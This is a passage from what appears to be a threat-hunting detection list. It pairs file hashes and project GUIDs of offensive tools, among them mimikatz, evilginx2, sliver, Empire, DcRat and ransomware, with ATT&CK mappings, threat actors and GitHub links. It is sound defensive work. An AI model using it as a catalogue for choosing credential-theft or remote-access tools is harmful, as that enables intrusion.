login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","39728" "*d55db7d82a8a8f375172b9a7e2a1cc01d4a7401266e6ec2ae1c6e179c2cf32ac*",".{0,1000}d55db7d82a8a8f375172b9a7e2a1cc01d4a7401266e6ec2ae1c6e179c2cf32ac.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","39729" "*d561756dd8152cceb60d50ae5650eedcdb022f306f193017aede737428ff2452*",".{0,1000}d561756dd8152cceb60d50ae5650eedcdb022f306f193017aede737428ff2452.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","39730" "*d56d56e534a399f0130e77ee424fc4c0c81e296a9c3a3560a97500a970119c1a*",".{0,1000}d56d56e534a399f0130e77ee424fc4c0c81e296a9c3a3560a97500a970119c1a.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","39732" "*d56e0de10ba38b39604171a2cfb22ff4cd6dffcd5f7646fb01a1715d39c522b6*",".{0,1000}d56e0de10ba38b39604171a2cfb22ff4cd6dffcd5f7646fb01a1715d39c522b6.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the 
awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","39733" "*d572fb79014f9b3a6595a71f37eb4bb3a34ecec79c62ef053a70f4b47ba13411*",".{0,1000}d572fb79014f9b3a6595a71f37eb4bb3a34ecec79c62ef053a70f4b47ba13411.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39734" "*d5743f7c28385bcb3b4a07eabd2a49a3791f5b0a929b60c50700cadac1451da8*",".{0,1000}d5743f7c28385bcb3b4a07eabd2a49a3791f5b0a929b60c50700cadac1451da8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39736" "*d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061*",".{0,1000}d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39738" 
"*d57894d047c6589b7baf7d8745523fe56197a09ffd33e5f577227c2c5a5a7adc*",".{0,1000}d57894d047c6589b7baf7d8745523fe56197a09ffd33e5f577227c2c5a5a7adc.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#filehash","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","39739" "*d57cbbc5b6f0d223b5a3470a6a444ea4ef49dad718cbe992c92cca935cfdac7d*",".{0,1000}d57cbbc5b6f0d223b5a3470a6a444ea4ef49dad718cbe992c92cca935cfdac7d.{0,1000}","offensive_tool_keyword","Termite","Termite rootkit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","39742" "*d57d2b2a2a345eaef9c6b06bb8cfb2ce2578b775cdc5deacfcada080db784f33*",".{0,1000}d57d2b2a2a345eaef9c6b06bb8cfb2ce2578b775cdc5deacfcada080db784f33.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39743" "*d57fb832ba62ad32cefe4f98fe504d503d85b429306780c63ac8a6ffc7af6cb6*",".{0,1000}d57fb832ba62ad32cefe4f98fe504d503d85b429306780c63ac8a6ffc7af6cb6.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash
#linux","N/A","5","","N/A","","","","39745" "*d5832804b0ca494327375e299c908a2d12b39053fa3cd1273f1899125e467557*",".{0,1000}d5832804b0ca494327375e299c908a2d12b39053fa3cd1273f1899125e467557.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39746" "*d583e8ee91ab53e8c797b3beb22bfb8b9e775f88436798225e2ec361832a8942*",".{0,1000}d583e8ee91ab53e8c797b3beb22bfb8b9e775f88436798225e2ec361832a8942.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","39747" "*D5865774-CD82-4CCE-A3F1-7F2C4639301B*",".{0,1000}D5865774\-CD82\-4CCE\-A3F1\-7F2C4639301B.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 
- TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#GUIDproject","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","39748" "*d5930d27f2cb09241e6d7761b334762e738f8d6937a0bf23df1a3f453d2bb4bd*",".{0,1000}d5930d27f2cb09241e6d7761b334762e738f8d6937a0bf23df1a3f453d2bb4bd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39749" "*d5aa5ef1208264ae918f0e285d358189f66d1166093657f0240a762220bd6a74*",".{0,1000}d5aa5ef1208264ae918f0e285d358189f66d1166093657f0240a762220bd6a74.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","39754" "*d5ad2fca7e56448f82eb0da69d8578abf2acce9616d9849622ccd17655f73285*",".{0,1000}d5ad2fca7e56448f82eb0da69d8578abf2acce9616d9849622ccd17655f73285.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","39755" 
"*d5b211c3a68fdd0231c3f6aa72dc980b8481e47fca6ce40605021d3e6222d7c5*",".{0,1000}d5b211c3a68fdd0231c3f6aa72dc980b8481e47fca6ce40605021d3e6222d7c5.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","39756" "*D5C4F5A2-5713-4A0A-A833-F9466AE5A339*",".{0,1000}D5C4F5A2\-5713\-4A0A\-A833\-F9466AE5A339.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","39758" "*d5c698b9cd57ec7571c3579601ebaa9f74167f767f13c716f5b72fed3f37cb67*",".{0,1000}d5c698b9cd57ec7571c3579601ebaa9f74167f767f13c716f5b72fed3f37cb67.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39759" "*d5c8e759b790c6ffb3134c8f0aae5865e2ae4c672dc09eaa312bc928fd0d78bd*",".{0,1000}d5c8e759b790c6ffb3134c8f0aae5865e2ae4c672dc09eaa312bc928fd0d78bd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39761" 
"*d5cd8e3db9434a439d26e9e870abfa4e4b45bb502e61878966ba3e90c0c1cfd3*",".{0,1000}d5cd8e3db9434a439d26e9e870abfa4e4b45bb502e61878966ba3e90c0c1cfd3.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","39763" "*d5d6d92f2c1c606b8717b9ed1027b806adfdb8f7eb32eadbb122b5f8094edaad*",".{0,1000}d5d6d92f2c1c606b8717b9ed1027b806adfdb8f7eb32eadbb122b5f8094edaad.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","39765" "*d5dff22f4db5a503538b01476f60d8e0fc9f203259866eeb96b551fb2271cf65*",".{0,1000}d5dff22f4db5a503538b01476f60d8e0fc9f203259866eeb96b551fb2271cf65.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","39766" "*d5f0032f2d09939afd7f054530076eefe4cdaca9a625197d12f3f13a92e884d0*",".{0,1000}d5f0032f2d09939afd7f054530076eefe4cdaca9a625197d12f3f13a92e884d0.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data 
Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","39769" "*d5fb8f91ffff93aecf6c68f864ce853a541d0bb7b53db3f5eb2fd6b8310cc5f2*",".{0,1000}d5fb8f91ffff93aecf6c68f864ce853a541d0bb7b53db3f5eb2fd6b8310cc5f2.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#filehash","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","39772" "*d603e7a5f7a44b5a07ab148df8032562a5847a1af7f4f66855d42e550c638d76*",".{0,1000}d603e7a5f7a44b5a07ab148df8032562a5847a1af7f4f66855d42e550c638d76.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39773" "*D60C351E1207F7C344C467BB09EC1EEA33D283C34FA56A531222871BB2542CE4*",".{0,1000}D60C351E1207F7C344C467BB09EC1EEA33D283C34FA56A531222871BB2542CE4.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","39774" "*d60cd24ca6f3a3d684dbaa018525676e0b9829ed3c10a04c4fbd728747c38b75*",".{0,1000}d60cd24ca6f3a3d684dbaa018525676e0b9829ed3c10a04c4fbd728747c38b75.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN
interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","39775" "*d617ba8cc034438b50e1b4afbe5ae7baa244176f01e67d6be160d1e5428537e2*",".{0,1000}d617ba8cc034438b50e1b4afbe5ae7baa244176f01e67d6be160d1e5428537e2.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","39776" "*d61c96edd06b7166d5c48c0941f1060c19a0342a6e9b8cb6844fe823fb5d1a58*",".{0,1000}d61c96edd06b7166d5c48c0941f1060c19a0342a6e9b8cb6844fe823fb5d1a58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39777" "*d61ec93dd0760f68a6b98f8dd073fcbbe7edeb55cbd3281f12df0af42ce6f794*",".{0,1000}d61ec93dd0760f68a6b98f8dd073fcbbe7edeb55cbd3281f12df0af42ce6f794.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","39778" 
"*d6255ae708bec781472a76a4cf10d9a53943a05ceeddc0737384cffe3eb38e29*",".{0,1000}d6255ae708bec781472a76a4cf10d9a53943a05ceeddc0737384cffe3eb38e29.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","39779" "*d62a0e8ea863d3812dcbf3927534db6b2a82223f2bfd2c374c7263be98b855f1*",".{0,1000}d62a0e8ea863d3812dcbf3927534db6b2a82223f2bfd2c374c7263be98b855f1.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","39780" "*d6304a65276af87fe87a4cddf75f571d1c73c601710fffebe9da17d762d521d2*",".{0,1000}d6304a65276af87fe87a4cddf75f571d1c73c601710fffebe9da17d762d521d2.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. 
This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#filehash","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","39781" "*d638f69107aa7957c7b4df0ae94e60f36d3a52b91dcc182710b6e9e8cd2696a3*",".{0,1000}d638f69107aa7957c7b4df0ae94e60f36d3a52b91dcc182710b6e9e8cd2696a3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39783" "*d639357536f4da8d953172982a82a87c028a8fb3e4e89307ebff92f5d6c99287*",".{0,1000}d639357536f4da8d953172982a82a87c028a8fb3e4e89307ebff92f5d6c99287.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39784" "*D640C36B-2C66-449B-A145-EB98322A67C8*",".{0,1000}D640C36B\-2C66\-449B\-A145\-EB98322A67C8.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","39787" "*d64995d25e55ebb524c83a516e8996cc3e3dd8cb03b7332f8ad95a5c775385b0*",".{0,1000}d64995d25e55ebb524c83a516e8996cc3e3dd8cb03b7332f8ad95a5c775385b0.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","39789" "*D64E40BB-9DAC-4491-8406-2CA2F2853F76*",".{0,1000}D64E40BB\-9DAC\-4491\-8406\-2CA2F2853F76.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","39791" "*d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4*",".{0,1000}d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39792" "*d650f132e50bca7c7a06965617a46e32e68f1066cf15cf04c2759bbcb81fbf68*",".{0,1000}d650f132e50bca7c7a06965617a46e32e68f1066cf15cf04c2759bbcb81fbf68.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","39793" "*d6521cf735fc2bb7f7c308b488c869d7cf4136c97b08cf0219ca2d6e64134290*",".{0,1000}d6521cf735fc2bb7f7c308b488c869d7cf4136c97b08cf0219ca2d6e64134290.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39794" 
"*d6521cf735fc2bb7f7c308b488c869d7cf4136c97b08cf0219ca2d6e64134290*",".{0,1000}d6521cf735fc2bb7f7c308b488c869d7cf4136c97b08cf0219ca2d6e64134290.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","39795" "*d653c01c040b025f77eda69eaff1b33f0e1f8542fc409dd42e936e35de22ff97*",".{0,1000}d653c01c040b025f77eda69eaff1b33f0e1f8542fc409dd42e936e35de22ff97.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","39796" 
"*d65432a573f67dd33aada2c4dd6ff20d76a7235b2f525979aac588702c4e2364*",".{0,1000}d65432a573f67dd33aada2c4dd6ff20d76a7235b2f525979aac588702c4e2364.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","39798" "*d65739e2f3ff43ab1fae9e7c88909f9fe40bf275684fedb5d0539e4cdac79fc9*",".{0,1000}d65739e2f3ff43ab1fae9e7c88909f9fe40bf275684fedb5d0539e4cdac79fc9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - 